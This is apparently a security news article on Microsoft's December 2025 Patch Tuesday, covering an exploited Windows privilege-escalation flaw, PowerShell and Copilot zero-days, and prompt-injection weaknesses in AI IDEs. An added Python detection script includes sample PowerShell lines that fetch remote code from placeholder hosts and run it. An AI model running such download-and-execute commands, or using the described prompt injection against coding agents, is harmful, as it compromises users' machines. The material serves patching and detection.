Microsoft Patches 56 Bugs, 1 Exploited and 2 Zero-Days

December 10, 2025 at 12:00 AM

Microsoft closed 2025 with a December Patch Tuesday that fixes 56 vulnerabilities across Windows and related products, including one actively exploited flaw and two zero-days. Three issues are rated Critical and 53 are Important. The company also shipped 17 additional fixes for its Chromium-based Edge browser since November, including an iOS spoofing bug (CVE-2025-62223, CVSS 4.3).

By the numbers

  • 56 total flaws: 3 Critical, 53 Important
  • Types: 29 privilege escalation, 18 remote code execution, 4 information disclosure, 3 denial-of-service, 2 spoofing
  • 2025 total: 1,275 CVEs patched, marking the second consecutive year over 1,000 and the third time ever

Actively exploited: CVE-2025-62221 (Windows Cloud Files Mini Filter)

  • Type/score: Use-after-free, CVSS 7.8
  • Impact: Local privilege escalation to SYSTEM
  • Context: The Cloud Files minifilter is a core Windows component used by services like OneDrive, Google Drive, and iCloud
  • Likely attack path: Low-privileged access (e.g., phishing, browser exploit, or another RCE) chained to CVE-2025-62221 for full host takeover; potential for domain-wide compromise when paired with credential theft
  • Discovery: Credited to MSTIC and MSRC
  • CISA KEV: Added to the Known Exploited Vulnerabilities catalog; U.S. FCEB agencies must patch by December 30, 2025

Two additional zero-days

  • CVE-2025-54100 (CVSS 7.8): Command injection in Windows PowerShell allowing local code execution. Risk increases when users are socially engineered to run commands like Invoke-WebRequest that fetch crafted content.
  • CVE-2025-64671 (CVSS 8.4): Command injection in GitHub Copilot for JetBrains enabling local code execution. Tied to broader IDE security research ("IDEsaster") highlighting risks from agentic IDE features and prompt-injection techniques.

AI/IDE security context

  • Recent findings show that multiple IDEs and AI tools can be coerced through cross-prompt injection, where LLM agents alter or generate prompts based on file contents or on data returned by Model Context Protocol servers.
  • Similar weaknesses were noted across tools including Kiro.dev, Cursor (CVE-2025-54131), JetBrains Junie (CVE-2025-59458), Gemini CLI, Windsurf, Roo Code (CVE-2025-54377, CVE-2025-57771, CVE-2025-65946), and GitHub Copilot for VS Code (rated Medium, no CVE).

What to do now

  • Patch priority: Fast-track CVE-2025-62221 across Windows fleets; meet CISA deadlines if applicable
  • PowerShell hardening: Restrict untrusted scripts, validate content sources, and monitor for suspicious Invoke-WebRequest usage
  • Update IDEs and AI agents: Apply vendor updates, tighten "execute command" tooling, and review auto-approve lists and guardrails
  • Browser hygiene: Update Microsoft Edge, including iOS builds, to address spoofing and other recent fixes
  • Monitoring: Track CISA KEV entries and vendor advisories for evolving exploitation
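The PowerShell monitoring item above, as an added example that is not part of the original article or of any Microsoft tooling: a small Python triage over constructed PowerShell script-block log entries (the text field of Event ID 4104, Microsoft-Windows-PowerShell/Operational) that flags Invoke-WebRequest usage and, separately, the higher-risk case where fetched content flows straight into an execution sink. Host names, URLs and script text are made up.

```python
import re

# Constructed sample (host, script-block text) pairs, modelled on what a
# SIEM would extract from Event ID 4104. Hypothetical data, not real logs.
SAMPLE_SCRIPT_BLOCKS = [
    ("host1", "Invoke-WebRequest -Uri https://intranet.example.invalid/report.csv "
              "-OutFile C:\\Temp\\report.csv"),
    ("host2", "iex (iwr http://203.0.113.5/payload.txt -UseBasicParsing).Content"),
    ("host3", "Invoke-Expression (Invoke-WebRequest 'http://example.invalid/x').Content"),
    ("host4", "Get-Process | Where-Object CPU -gt 100"),
    ("host5", "$r = Invoke-WebRequest -Uri http://example.invalid/cmd; "
              "& ([scriptblock]::Create($r.Content))"),
    ("host6", "iwr https://example.invalid/a.ps1 | iex"),
]

# Invoke-WebRequest and its aliases. 'curl' and 'wget' are aliases only in
# Windows PowerShell 5.1, so they are included for fleets still running it.
WEBREQUEST = re.compile(r"\b(Invoke-WebRequest|iwr|curl|wget)\b", re.IGNORECASE)

# Sinks that turn a string into executable code in the same session.
EXEC_SINK = re.compile(
    r"\b(Invoke-Expression|iex)\b|\[scriptblock\]::Create", re.IGNORECASE
)


def classify(block: str) -> str:
    """Return 'suspicious' when web-fetched content is fed into an execution
    sink, 'review' when a web request is present on its own, else 'benign'."""
    has_fetch = bool(WEBREQUEST.search(block))
    has_exec = bool(EXEC_SINK.search(block))
    if has_fetch and has_exec:
        return "suspicious"
    if has_fetch:
        return "review"
    return "benign"


def triage(entries):
    """Classify every (host, script_block) pair; returns (host, verdict, block)."""
    return [(host, classify(block), block) for host, block in entries]


if __name__ == "__main__":
    for host, verdict, block in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"{host:6} {verdict:10} {block[:70]}")
```

Entries rated "review" are ordinary downloads worth a glance; "suspicious" entries match the fetch-then-execute pattern that deserves an alert.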

Other vendors issuing fixes

Recent security updates also landed from Adobe, AWS, AMD, Arm, ASUS, Atlassian, Bosch, Broadcom (VMware), Canon, Cisco, Citrix, CODESYS, Dell, Devolutions, Django, Drupal, F5, Fortinet, Fortra, GitLab, Google (Android, Chrome, Cloud, Pixel, Pixel Watch), Hitachi Energy, HP, HPE (Aruba, Juniper), IBM, Imagination Technologies, Intel, Ivanti, Lenovo, major Linux distributions (AlmaLinux, Alpine, Amazon Linux, Arch, Debian, Gentoo, Oracle Linux, Mageia, Red Hat, Rocky Linux, SUSE, Ubuntu), MediaTek, Mitsubishi Electric, MongoDB, Moxa, Mozilla (Firefox, ESR), NVIDIA, OPPO, Progress Software, Qualcomm, React, Rockwell Automation, Samsung, SAP, Schneider Electric, Siemens, SolarWinds, Splunk, Synology, TP-Link, WatchGuard, Zoom, and Zyxel.

Source: The Hacker News